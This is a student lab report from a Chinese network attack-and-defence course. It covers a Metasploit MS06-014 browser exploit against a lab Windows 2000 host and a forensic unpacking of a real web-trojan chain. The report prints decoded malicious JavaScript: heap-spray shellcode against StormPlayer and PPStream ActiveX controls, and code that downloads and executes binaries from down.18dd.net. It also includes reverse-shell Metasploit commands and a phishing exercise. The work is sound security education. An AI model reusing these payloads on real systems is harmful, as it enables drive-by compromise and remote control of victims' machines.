20232903 2023-2024-2 《网络攻防实践》实践十一报告
一、实践内容
1.web浏览器渗透攻击
任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。
实验步骤:
(1)选择使用Metasploit中的MS06-014渗透攻击模块
(2)选择PAYLOAD为任意远程Shell连接
(3)设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本
(4)在靶机环境中启动浏览器,验证与服务器的连通性,并访问恶意网页木马脚本URL
(5)在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令
2.取证分析实践—网页木马攻击场景分析
网页木马:就是表面上伪装成普通的网页文件或是将恶意的代码直接插入到正常的网页文件中,当有人访问时,网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。
任务:访问start.html,进入 htm 解密,对每个文件地址作 32 位 MD5 散列,以散列值为文件名到
http://192.168.68.253/scom/hashed/
哈希值下去下载对应的文件,根据解密地址的不同选择继续解密或静态反汇编/动态调试,直至文件被全部分析完成。
实验步骤:
(1)访问start.html,在这个文件中给出了new09.htm的地址,
(2)在进入 htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到
http://192.168.68.253/scom/hashed/
哈希值下去下载对应的文件(注意:文件名中的英文字母为小写,且没有扩展名),即为解密出的地址对应的文件。
(3)如果解密出的地址给出的是网页或脚本文件,请继续解密。
(4)如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。
(5)重复以上过程直到这些文件被全部分析完成。
3.攻防对抗实践—web浏览器渗透攻击攻防
攻击方任务:使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。
防守方任务:对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。
二、实践过程
1.web浏览器渗透攻击
攻击机:Kali 192.168.200.3
靶机:Win2k 192.168.200.2
在Kali上使用sudo msfconsole 打开Metasploit,用Kali的msf 搜索MS06-014 使用此渗透攻击模块:
search MS06-014
设置并执行攻击载荷(命令如下):
set payload generic/shell_reverse_tcp
set RHOST 192.168.200.8
set LHOST 192.168.200.3
exploit
启动了恶意网页http://192.168.200.3:8080/0v4UH3:
用靶机Win2k访问该URL,返回一串字符串biRjfEyLPLWROYDPmlhGd:
返回Kali,会话已经创建成功:
此时攻击机得到一个会话,输入命令:sessions -i 1,选择会话1,返回shell,可以查看靶机的IP:
sessions
sessions -i 1
ipconfig
攻击成功:
2.取证分析实践—网页木马攻击场景分析
(1)找到四个hash
在文件里搜索 new09.htm,可以找到两处。我们发现 new09.htm 在被引用时,使用的是相对路径:
对new网页中的两个js文件做hash:
访问这两个hash值的文件,发现了一个xxtea的解密步骤:
从下图可以发现,23180a42a2ff1192150231b44ffdf3d3 文件中只有一段注释:
解析Xxtea的密钥。将 \x73\x63\x72\x69\x70\x74 密钥从16进制转为字符串,发现其代表的字符串为script:
得到script后,再利用在线Xxtea在线加密解密工具对超长的字符串进行解密:
将解密后的相关16进制部分转为字符串:
function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
try{var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/1.js><\/script>")}
else{
try{var f;var storm=new ActiveXObject("MPS.StormPlayer");}
catch(f){};
finally{if(f!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/b.js><\/script>")}}
try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/pps.js><\/script>")}}
try{var h;var obj=new ActiveXObject("BaiduBar.Tool");}
catch(h){};
finally{if(h!="[object Error]"){
obj.DloadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)}}
}}}
分析以上代码,可看出其中使用了“Adodb.Stream”(微软数据库访问对象)、“MPS.StormPlayer”(暴风影音)、POWERPLAYER.PowerPlayerCtrl.1”(PPStream)和“BaiduBar.Tool”(百度搜霸)外调函数漏洞。
同时对四个漏洞(四个js文件)做md5处理,获取对应引用的四个文件的hash值:
http://aa.18dd.net/aa/1.js%E7%9A%84md5%E5%80%BC%E4%B8%BA%EF%BC%9A5d7e9058a857aa2abee820d5473c5fa4
http://aa.18dd.net/aa/b.js%E7%9A%84md5%E5%80%BC%E4%B8%BA%EF%BC%9A3870c28cc279d457746b3796a262f166
http://aa.18dd.net/aa/pps.js%E7%9A%84md5%E5%80%BC%E4%B8%BA%EF%BC%9A5f0b8bf0385314dbe0e5ec95e6abedc2
http://down.18dd.net/bb/bd.cab%E7%9A%84md5%E5%80%BC%E4%B8%BA%EF%BC%9A
1c1d7b3539a617517c49eee4120783b2
(2)分析四个hash,找到四个exe
对于5d这个文件,解析后发现他在执行014.exe
var url="http://down.18dd.net/bb/014.exe";try{var xml=ado.CreateObject("Microsoft.XMLHTTP","");xml.Open
("GET",url,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path="..\\ntuser.com";as.savetofile(path,2);as.close
();var shell=ado.createobject("Shell.Application","");shell.ShellExecute("cmd.exe","/c "+path,"","open",0)}catch(e){}
对于38这个文件,首先利用packed解密,解密出来后根据url特性,(0x2f–/)进行解析,发现其使用了bf.exe
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 1=29("%10%10");5 26=20;5 14=29("%82%3"+"%81%10%83%84%87%3%86%85"+"%79%78%72%22%71%70%69%73"+"%74%77%17%76%75%88%89%103"+"%17%102%101%104%105%108%107%106"+"%100%99%93%92%25%91%68%94"+"%95%98%97%25%96%109%63%37"+"%31%39%41%40%19%42%43%45"+"%38%3%44%46%35%12%32%22"+"%33%36%34%3%19%67%61%60"+"%59%62%47%66%65%64%58%57"+"%16%24%51%50%49%24%48%16"+"%52%53%56%55%54%90%152%168"+"%167%166%165%110%170%173%12%172"+"%171%164%12%157%156%155%154%158"+"%159%162%161%160%175%185%189%188"+"%187%191%193%195%194%23%192%190"+"%186%179%178%177%176%180%181%184"+"%183%182%174%153%18%11%125%124"+"%15%123%122%126%127%130%21%129"+"%128%121%120%114%18%11%113%112"+"%111%115%116%119%118%117%21%131"+"%132%146%11%144%147%148%151%150%149%143%142%136%23%135%134%133%137%15%3");5 4=26+14.6;13(1.6<4)1+=1;28=1.30(0,4);2=1.30(0,1.6-4);13(2.6+4<138)2=2+2+28;27=141 140();139(7=0;7<169;7++)27[7]=2+14;5 8=\'\';13(8.6<145)8+="\\9\\9\\9\\9";163.80(8)',10,196,'|bigblock|block|u0000|slackspace|var|length|x|buffer|x0a|u9090|u0041|u57ff|while|shellcode|u6578|u4320|ufb03|u7972|uc683||u6461|ud88b|u7465|u4343|u468b|headersize|memory|fillblock|unescape|substring|u008b|u5afc|u016a|u0057|u5652|ue859|uc103|u6ae8|uc303|uf78b|ufa8b|u8b0e|u6ad0|u8300|u5904|u0dc6|u5e80|u03c6|u632f|u03c7|u6643|u206a|uff53|u5c03|u04c7|uec57|u646d|u6303|ufa75|u803e|u8046|u3680|u02e1|uc7dc|u8b40|uec83|u5613|ud1c3|u1e74|u8b3c|u738b|u0840|u0378|u8bf3|u3314|u4e8b|u207e|u8bad|u1c70|rawParse|u9000|uf3e9|u5a90|ua164|u8b0c|u408b|u0030|u56ed|u5157|u2e61|u0324|ucd8b|u5e5f|u03e1|u33c1|u031c|u088b|u66c9|u59e9|ue245|u0e6a|uf28b|u3f8b|uf359|u74a6|ufcef|u835f|u5908|uc1c3|u50c0|u6e6f|u6d6c|u7275|u6172|u5500|u4c52|u6f6c|u6e77|u6f44|u6269|u4c64|u7845|u0063|u456e|u6957|u7469|u6854|u616f|u4c00|u6572|u6f54|u6946|u6662|u2f62|u622f|u6e2e|u652e|0x40000|for|Array|new|u6464|u3831|u7468|4068|u656c|u7074|u2f3a|u2e6e|u776f|u642f|uc765|u6f74|uff58|u0040|u2451|u68f0|u33d0|uacc0|u5251|uf975|uc085|storm|u5300|u3300|u0065|u7804|u0344|300|u5350|u6adc|u8bfc|u5056|u6365|u5356|u6547|u0073|u7365|u7264|u5374|u7379|u7269|u446d|u6574|ud2ff|u6441|u33ee|ue2ab|u595a|u636f|uc3c0|u7250|u0ce8|u47ff|uffff'.split('|'),0,{}))
选用工具猫网页常用加密解密工具箱。本工具提供 在线MD5,在线SHA1 加密功能,以及 在线BASE64,在线ESCAPE,在线Packed加密解密,URI编码,URIComp编码,Unicode编码,URI解码,URIComp解码,Unicode解码 等功能,总之就是一个加密解密工具箱。
我们选择 Packed解密操作,输出形式为小写,字符集采用16进制,单个字符占8(Ascii)位。
var bigblock=unescape("%u9090%u9090");var headersize=20;var shellcode=unescape("%uf3e9%u0000"+"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c"+"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378"+"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b"+"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef"+"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1"+"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103"+"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904"+"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b"+"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e"+"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d"+"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320"+"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344"+"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc"+"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0"+"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab"+"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f"+"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574"+"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e"+"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00"+"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c"+"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54"+"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u6662%u652e%u6578%u0000");var slackspace=headersize+shellcode.length;while(bigblock.length<slackspace)bigblock+=bigblock;fillblock=bigblock.substring(0,slackspace);block=bigblock.substring(0,bigblock.length-slackspace);while(block.length+slackspace<0x40000)block=block+block+fillblock;memory=new Array();for(x=0;x<300;x++)memory[x]=block+shellcode;var buffer='';while(buffer.length<4068)buffer+="\x0a\x0a\x0a\x0a";storm.rawParse(buffer)
用字符串先解析出5f这个文件,得到路径http://down.18dd.net/bb/pps.exe
eval("\57\52\45\165\66\66\143\71\45\165\60\70\70\142\45\165\64\66\70\142\45\165\60\63\61\143\45\165\143\61\143\63\45\165\60\62\145\61\45\165\143\61\60\63\42\40\53\15\12\42\45\165\60\60\70\142\45\165\143\63\60\63\45\165\146\141\70\142\45\165\146\67\70\142\45\165\143\66\70\63\45\165\70\142\60\145\45\165\66\141\144\60\45\165\65\71\60\64\42\40\53\15\12\42\45\165\66\141\145\70\45\165\60\60\60\60\45\165\70\63\60\60\45\165\60\144\143\66\45\165\65\66\65\62\45\165\65\67\146\146\45\165\65\141\146\143\45\165\144\70\70\142\42\40\53\15\12\42\45\165\60\61\66\141\45\165\145\70\65\71\45\165\60\60\65\67\45\165\60\60\60\60\45\165\143\66\70\63\45\165\65\66\61\63\45\165\70\60\64\66\45\165\70\60\63\145\42\40\53\15\12\42\45\165\146\141\67\65\45\165\63\66\70\60\45\165\65\145\70\60\45\165\145\143\70\63\45\165\70\142\64\60\45\165\143\67\144\143\45\165\66\63\60\63\45\165\66\64\66\144\42\40\53\15\12\42\45\165\64\63\62\60\45\165\64\63\64\63\45\165\66\66\64\63\45\165\60\63\143\67\45\165\66\63\62\146\45\165\64\63\64\63\45\165\60\63\143\66\45\165\64\63\62\60\42\40\53\15\12\42\45\165\62\60\66\141\45\165\146\146\65\63\45\165\145\143\65\67\45\165\52\57\15\12\160\160\163\75\50\144\157\143\165\155\145\156\164\56\143\162\145\141\164\145\105\154\145\155\145\156\164\50\42\157\142\152\145\143\164\42\51\51\73\15\12\160\160\163\56\163\145\164\101\164\164\162\151\142\165\164\145\50\42\143\154\141\163\163\151\144\42\54\42\143\154\163\151\144\72\65\105\103\67\103\65\61\61\55\103\104\60\106\55\64\62\105\66\55\70\63\60\103\55\61\102\104\71\70\70\62\106\63\64\65\70\42\51\15\12\166\141\162\40\163\150\145\154\154\143\157\144\145\40\75\40\165\156\145\163\143\141\160\145\50\42\45\165\146\63\145\71\45\165\60\60\60\60\42\53\15\12\42\45\165\71\60\60\60\45\165\71\60\71\60\45\165\65\141\71\60\45\165\141\61\66\64\45\165\60\60\63\60\45\165\60\60\60\60\45\165\64\60\70\142\45\165\70\142\60\143\42\40\53\15\12\42\45\165\61\143\67\60\45\165\70\142\141\144\45\165\60\70\64\60\45\165\144\70\70\142\45\165\67\63\70\142\45\165\70\142\63\143\45\165\61\145\67\64\45\165\60\63\67\70\42\40\53\15\12\42\45\165\70\142\146\63\45\165\62\60\67\145\45\165\146\142\60\63\45\165\64\145\70\142\45\165\63\63\61\64\45\165\65\66\145\144\45\165\65\61\65\67\45\165\63\146\70\142\42\40\53\15\12\42\45\165\146\142\60\63\45\165\146\62\70\142\45\165\60\145\66\141\45\165\146\63\65\71\45\165\67\64\141\66\45\165\65\71\60\70\45\165\70\63\65\146\45\165\60\64\143\67\42\40\53\15\12\42\45\165\145\62\64\65\45\165\65\71\145\71\45\165\65\145\65\146\45\165\143\144\70\142\45\165\64\66\70\142\45\165\60\63\62\64\45\165\144\61\143\63\45\165\60\63\145\61\42\40\53\15\12\42\45\165\63\63\143\61\45\165\66\66\143\71\45\165\60\70\70\142\45\165\64\66\70\142\45\165\60\63\61\143\45\165\143\61\143\63\45\165\60\62\145\61\45\165\143\61\60\63\42\40\53\15\12\42\45\165\60\60\70\142\45\165\143\63\60\63\45\165\146\141\70\142\45\165\146\67\70\142\45\165\143\66\70\63\45\165\70\142\60\145\45\165\66\141\144\60\45\165\65\71\60\64\42\40\53\15\12\42\45\165\66\141\145\70\45\165\60\60\60\60\45\165\70\63\60\60\45\165\60\144\143\66\45\165\65\66\65\62\45\165\65\67\146\146\45\165\65\141\146\143\45\165\144\70\70\142\42\40\53\15\12\42\45\165\60\61\66\141\45\165\145\70\65\71\45\165\60\60\65\67\45\165\60\60\60\60\45\165\143\66\70\63\45\165\65\66\61\63\45\165\70\60\64\66\45\165\70\60\63\145\42\40\53\15\12\42\45\165\146\141\67\65\45\165\63\66\70\60\45\165\65\145\70\60\45\165\145\143\70\63\45\165\70\142\64\60\45\165\143\67\144\143\45\165\66\63\60\63\45\165\66\64\66\144\42\40\53\15\12\42\45\165\64\63\62\60\45\165\64\63\64\63\45\165\66\66\64\63\45\165\60\63\143\67\45\165\66\63\62\146\45\165\64\63\64\63\45\165\60\63\143\66\45\165\64\63\62\60\42\40\53\15\12\42\45\165\62\60\66\141\45\165\146\146\65\63\45\165\145\143\65\67\45\165\60\64\143\67\45\165\65\143\60\63\45\165\62\145\66\61\45\165\143\67\66\65\45\165\60\63\64\64\42\40\53\15\12\42\45\165\67\70\60\64\45\165\60\60\66\65\45\165\63\63\60\60\45\165\65\60\143\60\45\165\65\63\65\60\45\165\65\60\65\66\45\165\65\67\146\146\45\165\70\142\146\143\42\40\53\15\12\42\45\165\66\141\144\143\45\165\65\63\60\60\45\165\65\67\146\146\45\165\66\70\146\60\45\165\62\64\65\61\45\165\60\60\64\60\45\165\146\146\65\70\45\165\63\63\144\60\42\40\53\15\12\42\45\165\141\143\143\60\45\165\143\60\70\65\45\165\146\71\67\65\45\165\65\62\65\61\45\165\65\63\65\66\45\165\144\62\146\146\45\165\65\71\65\141\45\165\145\62\141\142\42\40\53\15\12\42\45\165\63\63\145\145\45\165\143\63\143\60\45\165\60\143\145\70\45\165\146\146\146\146\45\165\64\67\146\146\45\165\67\64\66\65\45\165\67\62\65\60\45\165\66\63\66\146\42\40\53\15\12\42\45\165\66\64\64\61\45\165\67\62\66\64\45\165\67\63\66\65\45\165\60\60\67\63\45\165\66\65\64\67\45\165\65\63\67\64\45\165\67\63\67\71\45\165\66\65\67\64\42\40\53\15\12\42\45\165\64\64\66\144\45\165\67\62\66\71\45\165\66\63\66\65\45\165\66\146\67\64\45\165\67\71\67\62\45\165\60\60\64\61\45\165\66\71\65\67\45\165\64\65\66\145\42\40\53\15\12\42\45\165\66\65\67\70\45\165\60\60\66\63\45\165\67\70\64\65\45\165\67\64\66\71\45\165\66\70\65\64\45\165\66\65\67\62\45\165\66\64\66\61\45\165\64\143\60\60\42\40\53\15\12\42\45\165\66\61\66\146\45\165\64\143\66\64\45\165\66\62\66\71\45\165\66\61\67\62\45\165\67\71\67\62\45\165\60\60\64\61\45\165\67\62\67\65\45\165\66\144\66\143\42\40\53\15\12\42\45\165\66\145\66\146\45\165\65\65\60\60\45\165\64\143\65\62\45\165\66\146\64\64\45\165\66\145\67\67\45\165\66\146\66\143\45\165\66\64\66\61\45\165\66\146\65\64\42\40\53\15\12\42\45\165\66\71\64\66\45\165\66\65\66\143\45\165\60\60\64\61\45\165\67\64\66\70\45\165\67\60\67\64\45\165\62\146\63\141\45\165\66\64\62\146\45\165\67\67\66\146\45\165\62\145\66\145\45\165\63\70\63\61\45\165\66\64\66\64\45\165\66\145\62\145\45\165\67\64\66\65\45\165\66\62\62\146\45\165\62\146\66\62\45\165\67\60\67\60\45\165\62\145\67\63\45\165\67\70\66\65\45\165\60\60\66\65\42\51\73\15\12\166\141\162\40\142\151\147\142\154\157\143\153\40\75\40\165\156\145\163\143\141\160\145\50\42\45\165\71\60\71\60\45\165\71\60\71\60\42\51\73\15\12\166\141\162\40\150\145\141\144\145\162\163\151\172\145\40\75\40\62\60\73\15\12\166\141\162\40\163\154\141\143\153\163\160\141\143\145\40\75\40\150\145\141\144\145\162\163\151\172\145\53\163\150\145\154\154\143\157\144\145\56\154\145\156\147\164\150\73\15\12\167\150\151\154\145\40\50\142\151\147\142\154\157\143\153\56\154\145\156\147\164\150\74\163\154\141\143\153\163\160\141\143\145\51\40\142\151\147\142\154\157\143\153\53\75\142\151\147\142\154\157\143\153\73\15\12\146\151\154\154\142\154\157\143\153\40\75\40\142\151\147\142\154\157\143\153\56\163\165\142\163\164\162\151\156\147\50\60\54\40\163\154\141\143\153\163\160\141\143\145\51\73\15\12\142\154\157\143\153\40\75\40\142\151\147\142\154\157\143\153\56\163\165\142\163\164\162\151\156\147\50\60\54\40\142\151\147\142\154\157\143\153\56\154\145\156\147\164\150\55\163\154\141\143\153\163\160\141\143\145\51\73\15\12\167\150\151\154\145\50\142\154\157\143\153\56\154\145\156\147\164\150\53\163\154\141\143\153\163\160\141\143\145\74\60\170\64\60\60\60\60\51\40\142\154\157\143\153\40\75\40\142\154\157\143\153\53\142\154\157\143\153\53\146\151\154\154\142\154\157\143\153\73\15\12\155\145\155\157\162\171\40\75\40\156\145\167\40\101\162\162\141\171\50\51\73\15\12\146\157\162\40\50\170\75\60\73\40\170\74\64\60\60\73\40\170\53\53\51\40\155\145\155\157\162\171\133\170\135\40\75\40\142\154\157\143\153\40\53\40\163\150\145\154\154\143\157\144\145\73\15\12\166\141\162\40\142\165\146\146\145\162\40\75\40\47\47\73\15\12\167\150\151\154\145\40\50\142\165\146\146\145\162\56\154\145\156\147\164\150\40\74\40\65\60\60\51\40\142\165\146\146\145\162\53\75\42\134\170\60\141\134\170\60\141\134\170\60\141\134\170\60\141\42\73\15\12\160\160\163\56\114\157\147\157\40\75\40\142\165\146\146\145\162\15\12")
/*%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u*/
pps=(document.createElement("object"));
pps.setAttribute("classid","clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458")
var shellcode = unescape("%uf3e9%u0000"+
"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u7070%u2e73%u7865%u0065");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<400; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 500) buffer+="\x0a\x0a\x0a\x0a";
pps.Logo = buffer
1c1d7b3539a617517c49eee4120783b2.zip文件是一个压缩包,在虚拟机中解压,得到一个bd.exe文件:
(3)分析四个exe
获取前三个文件的所要下载的文件的MD5值:
http://down.18dd.net/bb/014.exe MD5值为:ca4e4a1730b0f69a9b94393d9443b979
http://down.18dd.net/bb/bf.exe MD5值为:268cbd59fbed235f6cf6b41b92b03f8e
http://down.18dd.net/bb/pps.exe MD5值为:ff59b3b8961f502289c1b4df8c37e2a4
于是我们有了四个 exe 文件(014.exe,bf.exe,pps.exe,bd.exe)。在资源中找到对应文件,发现四个文件的大小相同,进一步对文件内容进行 MD5 散列计算,得出结论:这四个文件都是一样的。
拿其中一个进行举例,通过ida反汇编进行分析。
导入表操作:
其中,函数writefsdword的作用是将内存写入相对于 FS 段开头的偏移量指定的位置。
下载文件操作:
以上这些是string window中的下载.exe文件的链接,可能是用于下载木马。
3.攻防对抗实践—web浏览器渗透攻击攻防
攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。
防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。
(1)攻击
攻击方:20232903
防守方:20232937
在msf里寻找火狐漏洞,use 34:
配置攻击载荷进行攻击:
set payload windows/shell/bind_tcp
set URIPATH /
run
配置钓鱼邮件:
受害者点击后 成功:
(2)防守
攻击方:20232937
防守方:20232903
点击钓鱼邮件,弹出对话框:
<script>
var N={"\u005f\153\145\x79\u0053\x74\162":(function () { var sq="9+/=",oP="345678",I="hijklmnopqrstuvwxyz012",b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg"; return b+I+oP+sq })(),"\137\u0075\x74\u0066\u0038\u005f\145\u006e\143\u006f\u0064\145":function(x){x=x[((function () { var jM="ce",m="la",cs="rep"; return cs+m+jM })())](/\r\n/g,String.fromCharCode(92,0x6e));var W="";var S_;for(S_=('XsCxjWSWP'.length-9);S_<x[(String.fromCharCode(0x6c,101,0156,0x67,0164,104))];S_++){var V=x[((function () { var h="t",nY="odeA",XH="C",JG="r",$="cha"; return $+JG+XH+nY+h })())](S_);if(V<(0x1*74+54)){W+=String[((function () { var o$="ode",WA="rC",A="fromCha"; return A+WA+o$ })())](V);}else if((V>('u'.length*105+22))&&(V<('ww'.length*(01*('x'.length*(0x2*0xca+43)+269)+251)+114))){W+=String[(String.fromCharCode(0146,0162,111,109,0x43,0x68,0x61,0162,0103,0157,0144,0145))]((V>>'wjBNpq'.length)|('T'.length*0201+63));W+=String[(String.fromCharCode(0x66,0x72,111,0x6d,0103,0x68,0141,0162,0103,0x6f,0x64,0x65))]((V&(0xc*'NpJlK'.length+3))|(2*('t'.length*('T'.length*('HD'.length*8+6)+12)+24)+12));}else {W+=String[((function () { var hz="rCode",Z="fromCha"; return Z+hz })())]((V>>(0x3*4+0))|('w'.length*(03*(0x1*051+21)+4)+34));W+=String[((function () { var s="ode",S="rC",ro="fromCha"; return ro+S+s })())](((V>>'dnqbDf'.length)&(1*60+3))|(01*('w'.length*50+27)+51));W+=String[(String.fromCharCode(102,0x72,0157,0x6d,0103,0x68,0141,114,67,111,0x64,101))]((V&('I'.length*0x2d+18))|(1*93+35));}}return W;},"\145\156\143\x6f\x64\u0065":function(x){var V="";var yw,bF,$,q7,zF,C,m9;var o=('DAF'.length-3);x=N[((function () { var P="code",BY="n",H="f8_e",Xe="t",W="_u"; return W+Xe+H+BY+P })())](x);while(o<x[((function () { var NC="th",B2="g",mK="len"; return mK+B2+NC })())]){yw=x[((function () { var JC="t",nw="CodeA",r="char"; return r+nw+JC })())](o++);bF=x[(String.fromCharCode(0x63,0150,97,0x72,0x43,111,0144,0x65,0x41,116))](o++);$=x[((function () { var q0="t",t="deA",jN="charCo"; return jN+t+q0 })())](o++);q7=yw>>'iL'.length;zF=((yw&'Wii'.length)<<'ykxw'.length)|(bF>>'rWqT'.length);C=((bF&('lMN'.length*'mGfZ'.length+3))<<'Qe'.length)|($>>'WdqfNV'.length);m9=$&(02*0x1b+9);if(window[(function () { var ZM="aN",R="isN"; return R+ZM })()](bF)){C=m9=('b'.length*('L'.length*0x1a+10)+28);}else if(window[String.fromCharCode(0151,0163,0x4e,0x61,78)]($)){m9=(0x1*('V'.length*('BDBRGi'.length*5+4)+25)+5);}V=V+this[(String.fromCharCode(95,0153,0145,121,0x53,116,114))][(String.fromCharCode(99,0x68,0x61,0x72,65,116))](q7)+this[((function () { var Hl="r",Ps="eySt",ZQ="k",EY="_"; return EY+ZQ+Ps+Hl })())][((function () { var We="t",o2="arA",iG="ch"; return iG+o2+We })())](zF)+this[((function () { var Yc="r",to="eySt",FF="k",QF="_"; return QF+FF+to+Yc })())][(String.fromCharCode(99,0x68,0x61,0x72,0x41,116))](C)+this[(String.fromCharCode(0137,0153,101,0171,0123,116,114))][(String.fromCharCode(0143,0150,97,0162,0x41,0x74))](m9);}return V;},"\x64\145\u0063\u006f\u0064\145":function(x){var B2="";var e,X,D;var vr,HY,pg,w;var l=('IXA'.length-3);x=x[((function () { var s="e",lv="c",An="pla",d="re"; return d+An+lv+s })())](/[^A-Za-z0-9\+\/\\=]/g,"");while(l<x[((function () { var kV="th",F$="leng"; return F$+kV })())]){vr=this[((function () { var Px="tr",W_="keyS",j="_"; return j+W_+Px })())][(String.fromCharCode(0x69,110,0144,0x65,120,0117,0146))](x[(String.fromCharCode(0143,0x68,0141,0x72,0101,0164))](l++));HY=this[(String.fromCharCode(0x5f,0153,0x65,0x79,0123,0x74,0162))][((function () { var x8="exOf",Sm="ind"; return Sm+x8 })())](x[((function () { var S="t",Nh="rA",z="cha"; return z+Nh+S })())](l++));pg=this[(String.fromCharCode(0137,0x6b,101,0x79,0x53,0164,0x72))][((function () { var u="f",pt="xO",CN="de",Od="in"; return Od+CN+pt+u })())](x[((function () { var W="At",Q2="char"; return Q2+W 